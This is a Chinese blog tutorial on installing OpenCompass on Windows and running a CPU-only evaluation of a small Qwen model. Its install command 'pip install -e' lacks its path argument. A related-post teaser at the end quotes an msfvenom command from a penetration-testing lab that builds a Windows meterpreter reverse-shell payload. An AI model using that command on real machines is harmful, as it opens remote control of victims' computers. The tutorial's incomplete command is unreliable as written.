在Windows下快速体验与学习使用opencompass

本文介绍了OpenCompass大模型评估工具的使用方法。首先概述了OpenCompass的功能和评估体系，然后详细说明了安装步骤：包括克隆源码、创建conda环境、安装依赖等。文章特别说明了CPU环境下的配置方法，并提供了模型测试和数据集配置的具体操作指南。最后介绍了如何使用OpenCompass进行模型评测，包括修改配置文件和使用命令启动评估任务。整个过程强调注意事项，如避免中断安装、耐心等待

small_white_pig

333人浏览 · 2025-12-25 15:19:31

small_white_pig · 2025-12-25 15:19:31 发布

引言

简要介绍OpenCompass的功能和适用场景，快速上手它的配置使用，以帮助大家快速开发。

我默认大家已经有了基本的开发环境，conda，git已经配置成功。

后续工作会在此更新

OpenCompass概述

为准确、全面、系统化地评估大语言模型的能力，OpenCompass从通用人工智能的角度出发，结合学术界的前沿进展和工业界的最佳实践，提出一套面向实际应用的模型能力评价体系。OpenCompass能力维度体系涵盖通用能力和特色能力两大部分。

注意：如果电脑有gpu，但是有可能会与torch不适配，在此我用cpu来做例子

运行过程不要点击到终端，否则会中断

安装与配置

1.将opencompass的源码下载至本地

git clone https://github.com/open-compass/opencompass.git

2.使用conda创建opencompass的虚拟环境

conda create -n opencompass python=3.10

3.然后在pycharm中配置配置解释器，选择现有的conda，opencompass

4.安装相关依赖,在Pycharm的终端进行

pip install -r requirements.txt

5.添加opencompass 模块

pip install -e

6.环境测试

opencompass --models hf_internlm2_5_1_8b_chat --datasets demo_gsm8k_chat_gen --dry-run

基本到这里就差不多没事了，后面配置好数据集和模型就好了

二、让opencompass跑起来

关于模型，opencompass有提前写好，自定义模型，可在官方文档学习

可用python config/tools查看目前的模型与数据集

1.配置数据集

wget https://github.com/open-compass/opencompass/releases/download/0.2.2.rc1/OpenCompassData-complete-20240207.zip

2.进行评测

由于使用cpu进行评测，为什么使cpu压力更小使用千问0.5b的模型

修改配置

在opencompass下，config/models/qwen，找到qwen1.5-0.5b-hf，修改最后一列num_gpus=0

在pycharm终端使用如下命令

opencompass --models hf_qwen1_5_0_5b --datasets demo_gsm8k_chat_gen

时间长大约2个小时，耐心等待。

结果分析

自定义评估任务

根据以上内容有大致的思维过程，可以进行更多的配置与评估

参考资料

安装 — OpenCompass 0.5.1 文档https://opencompass.readthedocs.io/zh-cn/latest/get_started/installation.html

2048 AI社区

有“AI”的1024 = 2048，欢迎大家加入2048 AI社区

更多推荐

【硬核干货】国产GPU杀疯了！S5000单卡跑满血DeepSeek大模型，1024 token/s解码速度让程序员惊呼“yyds“！

2048 AI社区

百度伐谋申请企业超2000家，发布同舟生态伙伴计划加速共创落地

2048 AI社区

网络渗透测试作业6：网站配置和远程控制

但kali中的payload我移到电脑桌面后，在后续的实验中点击kali却无反应，后面查询AI说如果目标windows是64位，那么payload也应是64位，我运行payload后在任务管理器中发现它是32位，所以我采用另外一种命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.139.132 lport=5000 -